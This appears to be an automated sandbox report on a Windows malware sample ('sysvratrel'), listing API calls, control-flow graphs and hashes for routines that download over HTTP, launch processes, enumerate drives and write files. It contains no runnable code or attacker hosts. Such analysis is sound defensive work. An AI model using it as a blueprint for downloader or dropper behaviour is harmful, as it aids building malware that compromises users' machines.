                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                          • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                          • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                          • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                          • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                          • String ID: PCOI$ilci
                                                                          • API String ID: 2403999931-3762367603
                                                                          • Opcode ID: 1a1d8dd466f73ad32925f591319fce38dcb0625be9ff5656726825d3c16979f1
                                                                          • Instruction ID: 6a29a2099ab565f473fc8e7e311d0e2c8013c240518d5c358219ad3f6c04db59
                                                                          • Opcode Fuzzy Hash: 1a1d8dd466f73ad32925f591319fce38dcb0625be9ff5656726825d3c16979f1
                                                                          • Instruction Fuzzy Hash: C231A675900701ABC720DF70EC48B97B7A8BF08304F048A2AF559A3691D77AF894CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • memset.NTDLL ref: 00405838
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                                                          • Sleep.KERNEL32(00000001), ref: 00405864
                                                                          • GetTickCount.KERNEL32 ref: 0040586A
                                                                          • GetTickCount.KERNEL32 ref: 00405873
                                                                          • wsprintfW.USER32 ref: 00405886
                                                                          • RegisterClassExW.USER32(00000030), ref: 00405893
                                                                          • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                                                          • TranslateMessage.USER32(?), ref: 004058E5
                                                                          • DispatchMessageA.USER32(?), ref: 004058EF
                                                                          • ExitThread.KERNEL32 ref: 00405901
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                          • String ID: %x%X$0
                                                                          • API String ID: 716646876-225668902
                                                                          • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                          • Instruction ID: b462c37bb5856212f40d891765093af4ebd6b4ddfa956f9ba6030597f9716a14
                                                                          • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                                                          • Instruction Fuzzy Hash: 3B212F71940308BBEB10ABA0DC49FEE7B78EB04711F148439F605BA1D0DBB955948F69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 688 40de00-40de9b memset InternetCrackUrlA InternetOpenA 689 40dea1-40ded4 InternetConnectA 688->689 690 40e017-40e020 688->690 691 40e00a-40e011 InternetCloseHandle 689->691 692 40deda-40df0a HttpOpenRequestA 689->692 691->690 693 40df10-40df27 HttpSendRequestA 692->693 694 40dffd-40e004 InternetCloseHandle 692->694 695 40dff0-40dff7 InternetCloseHandle 693->695 696 40df2d-40df31 693->696 694->691 695->694 697 40dfe6 696->697 698 40df37 696->698 697->695 699 40df41-40df48 698->699 700 40dfd9-40dfe4 699->700 701 40df4e-40df70 InternetReadFile 699->701 700->695 702 40df72-40df79 701->702 703 40df7b 701->703 702->703 704 40df7d-40dfd4 call 40a220 memcpy 702->704 703->700 704->699
                                                                          APIs
                                                                          • memset.NTDLL ref: 0040DE28
                                                                          • InternetCrackUrlA.WININET(0040D8D9,00000000,10000000,0000003C), ref: 0040DE78
                                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DE88
                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DEC1
                                                                          • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DEF7
                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DF1F
                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DF68
                                                                          • memcpy.NTDLL(00000000,?,00000000), ref: 0040DFBA
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040DFF7
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E004
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040E011
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                          • String ID: <$GET
                                                                          • API String ID: 1205665004-427699995
                                                                          • Opcode ID: 586f4d44eed5d039de0127940acf01a2ad9793e0e838c3ecfdf54c1eaebf072c
                                                                          • Instruction ID: 48cd83f5195f7f7898929b3619b8d091957442f788ca39022680675dc0c7e588
                                                                          • Opcode Fuzzy Hash: 586f4d44eed5d039de0127940acf01a2ad9793e0e838c3ecfdf54c1eaebf072c
                                                                          • Instruction Fuzzy Hash: 51510D71941228ABDB36CB50CC55BD9B7BCAB44705F0480E9F60D6A2C1D7B96BC8CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • Sleep.KERNEL32(000003E8), ref: 00406B3E
                                                                          • GetModuleFileNameW.KERNEL32(00000000,00416C68,00000104), ref: 00406B50
                                                                            • Part of subcall function 0040E9B0: CreateFileW.KERNEL32(`k@,80000000,00000001,00000000,00000003,00000000,00000000,00406B60), ref: 0040E9D0
                                                                            • Part of subcall function 0040E9B0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E9E5
                                                                            • Part of subcall function 0040E9B0: CloseHandle.KERNEL32(000000FF), ref: 0040E9F2
                                                                          • ExitThread.KERNEL32 ref: 00406CBA
                                                                            • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                                            • Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                            • Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                            • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                          • Sleep.KERNEL32(000007D0), ref: 00406CAD
                                                                            • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                          • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406BEF
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C04
                                                                          • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C1F
                                                                          • wsprintfW.USER32 ref: 00406C32
                                                                          • wsprintfW.USER32 ref: 00406C52
                                                                          • wsprintfW.USER32 ref: 00406C75
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                          • String ID: (%dGB)$%s%s$Unnamed volume
                                                                          • API String ID: 1650488544-2117135753
                                                                          • Opcode ID: a2847b52452a9436204765ae7005680d6cea0653e596760aabb44eafc458b4af
                                                                          • Instruction ID: ad18969486da017d66fc0e664040911e0da7e4c37c3c5655858771b0e8e5c1cf
                                                                          • Opcode Fuzzy Hash: a2847b52452a9436204765ae7005680d6cea0653e596760aabb44eafc458b4af
                                                                          • Instruction Fuzzy Hash: 6B41A9B1900318BBE714DB94DD55FEE7378EB48700F0081A5F20AB51D0EA785794CF6A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 728 40ea00-40ea3f CreateFileW 729 40ea45-40ea60 CreateFileMappingW 728->729 730 40eb5a-40eb5e 728->730 731 40eb50-40eb54 CloseHandle 729->731 732 40ea66-40ea7f MapViewOfFile 729->732 733 40eb60-40eb80 CreateFileW 730->733 734 40ebb4-40ebba 730->734 731->730 735 40ea85-40ea9b GetFileSize 732->735 736 40eb46-40eb4a CloseHandle 732->736 737 40eb82-40eba2 WriteFile CloseHandle 733->737 738 40eba8-40ebb1 call 40a3f0 733->738 739 40eaa1-40eab4 call 40ca30 735->739 740 40eb3c-40eb40 UnmapViewOfFile 735->740 736->731 737->738 738->734 739->740 745 40eaba-40eac9 739->745 740->736 745->740 746 40eacb-40eafa call 40c3d0 745->746 746->740 749 40eafc-40eb27 call 40a720 memcmp 746->749 749->740 752 40eb29-40eb35 call 40a3f0 749->752 752->740
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040EA32
                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040EA53
                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040EA72
                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EA8B
                                                                          • memcmp.NTDLL ref: 0040EB1D
                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EB40
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040EB4A
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040EB54
                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EB73
                                                                          • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EB98
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040EBA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                          • String ID:
                                                                          • API String ID: 3902698870-0
                                                                          • Opcode ID: 3d158a9dff6b220208ce89ebcb141fa2d9abde8426d91b684894d5fe3e6cfe1f
                                                                          • Instruction ID: 5fa72956d792c98bf49e98e2e31999c9ee619b8bc34dd7c72e15d09ac2df7f98
                                                                          • Opcode Fuzzy Hash: 3d158a9dff6b220208ce89ebcb141fa2d9abde8426d91b684894d5fe3e6cfe1f
                                                                          • Instruction Fuzzy Hash: C2514EB5E40208FBDB14DFA4CC49FDEB774AB48704F108569E611B72C0D7B9AA45CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCurrentThread.KERNEL32 ref: 0040D516
                                                                          • GetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E,?,000000FF), ref: 0040D51D
                                                                          • GetCurrentThread.KERNEL32 ref: 0040D528
                                                                          • SetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E,?,000000FF), ref: 0040D52F
                                                                          • InterlockedExchangeAdd.KERNEL32(00407D0E,00000000), ref: 0040D552
                                                                          • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D587
                                                                          • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D5D2
                                                                          • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D5EE
                                                                          • Sleep.KERNEL32(00000001), ref: 0040D61E
                                                                          • GetCurrentThread.KERNEL32 ref: 0040D62D
                                                                          • SetThreadPriority.KERNEL32(00000000,?,?,?,00407D0E), ref: 0040D634
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                          • String ID:
                                                                          • API String ID: 3862671961-0
                                                                          • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                          • Instruction ID: 00112f281c6e7fc3510a654903225a70fc6abbe47ad766b876a095a97212bdbe
                                                                          • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                                                          • Instruction Fuzzy Hash: 64411C74E00209EFDB14CFE4D848BAEBBB5EF48305F108566E905A7380D7799A85CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • memset.NTDLL ref: 0040EBCE
                                                                          • memset.NTDLL ref: 0040EBDE
                                                                          • CreateProcessW.KERNEL32(00000000,0040F065,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EC17
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040EC27
                                                                          • ShellExecuteW.SHELL32(00000000,open,0040F065,00000000,00000000,00000000), ref: 0040EC42
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040EC5C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                          • String ID: $D$open
                                                                          • API String ID: 3787208655-2182757814
                                                                          • Opcode ID: 3c17362cf3061ec7cce867e0b2926868dc4a4ed0f6c2d491f15d9c7bfa1c2f38
                                                                          • Instruction ID: 0351ccfd918ecb695d128b5eda6762ce2dd083b24a7fe2c71c98e7e13efc789c
                                                                          • Opcode Fuzzy Hash: 3c17362cf3061ec7cce867e0b2926868dc4a4ed0f6c2d491f15d9c7bfa1c2f38
                                                                          • Instruction Fuzzy Hash: FE114271A44308BBF710DB91DD46FDE7774AB14B00F104125F6057E2C1D6FA5A44C759
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                          • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                          • setsockopt.WS2_32 ref: 00401F2C
                                                                          • closesocket.WS2_32(?), ref: 00401F39
                                                                            • Part of subcall function 0040D6E0: NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
                                                                            • Part of subcall function 0040D6E0: RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                          • String ID:
                                                                          • API String ID: 671207744-0
                                                                          • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                          • Instruction ID: a734cc1f61c70acf9279ac5ca78d82aa64a2a4ecc5b5604f6a29b6a4ece08d42
                                                                          • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                                                          • Instruction Fuzzy Hash: 89519E75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DB1E
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040DB2E
                                                                          • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DB4B
                                                                          • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DB61
                                                                          • StrChrA.SHLWAPI(?,0000000D), ref: 0040DB8E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleeprecvfrom
                                                                          • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                          • API String ID: 668330359-3973262388
                                                                          • Opcode ID: e015ad2410b45833169f487912bda9b410abab1e9ab3979957402fade9c208bb
                                                                          • Instruction ID: 994a5b39e446e5258177b8a9e706ad28fc86481e8e9e2fe7090657293928531c
                                                                          • Opcode Fuzzy Hash: e015ad2410b45833169f487912bda9b410abab1e9ab3979957402fade9c208bb
                                                                          • Instruction Fuzzy Hash: 3A2151B0D44218ABDB20DB64DC45BE97774AB04308F1486E9E719B72C0C6B95ACACF5C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EC87
                                                                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040ECA6
                                                                          • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040ECCF
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040ECF8
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040ED02
                                                                          • Sleep.KERNEL32(000003E8), ref: 0040ED0D
                                                                          Strings
                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EC82
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                          • API String ID: 2743515581-2272513262
                                                                          • Opcode ID: 5ec0293591b024498722aefa6d6b6499534c9d8093b9b534ce5668c941633b32
                                                                          • Instruction ID: 7e4e1c9f171caca0646539a3bded0a22de56d1af13d1156f275757e23962dbb7
                                                                          • Opcode Fuzzy Hash: 5ec0293591b024498722aefa6d6b6499534c9d8093b9b534ce5668c941633b32
                                                                          • Instruction Fuzzy Hash: 27213A74A40348FBEB14DF94CC49FEEB775AB04704F1084A9FA11AB2D0C7BA6A40CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(004176A8,?,?,?,?,?,?,00407C92), ref: 0040B50B
                                                                          • CreateFileW.KERNEL32(00417490,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B55D
                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B57E
                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B59D
                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B5B2
                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B618
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040B622
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040B62C
                                                                            • Part of subcall function 0040D6E0: NtQuerySystemTime.NTDLL(0040B5F5), ref: 0040D6EA
                                                                            • Part of subcall function 0040D6E0: RtlTimeToSecondsSince1980.NTDLL(0040B5F5,?), ref: 0040D6F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                          • String ID:
                                                                          • API String ID: 439099756-0
                                                                          • Opcode ID: a9f3d94bdcb9f5f0056996c106e0f71434a739864a126caadcc4012290d45a57
                                                                          • Instruction ID: 29fa8a612647d1d21a92a83f8fc84a43d263a312b3bcc6ad32b06dcb2fb765dc
                                                                          • Opcode Fuzzy Hash: a9f3d94bdcb9f5f0056996c106e0f71434a739864a126caadcc4012290d45a57
                                                                          • Instruction Fuzzy Hash: 41413C74E40309BBDB10DFA4CC4ABAEB770EB44708F208569E611B72D1C7B96641CB9D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00416C40,?,?,?,?,?,00407C5C), ref: 00405B6B
                                                                          • CreateFileW.KERNEL32(00416E70,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407C5C), ref: 00405B85
                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                          • String ID:
                                                                          • API String ID: 3956458805-0
                                                                          • Opcode ID: 4a7cc75c1fcf6fb7aee4929f62d661ed4a6a37d9273678fc0e2124efc9c7db27
                                                                          • Instruction ID: fe22dcd5f9c76504c29afc9a33c71b71b278b318499f2180723d1a87b0050cb8
                                                                          • Opcode Fuzzy Hash: 4a7cc75c1fcf6fb7aee4929f62d661ed4a6a37d9273678fc0e2124efc9c7db27
                                                                          • Instruction Fuzzy Hash: 76311B74A40308EBEB14DBA4CD4AFAFB774EB44704F208569E601772D0D7B96A81CF99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00416C40,00000000,0040BB32,006A0266,?,0040BB4E,00000000,0040D2E4,?), ref: 0040600F
                                                                          • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                                                          • CreateFileW.KERNEL32(00416E70,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                                                          • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                                                          • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040623D
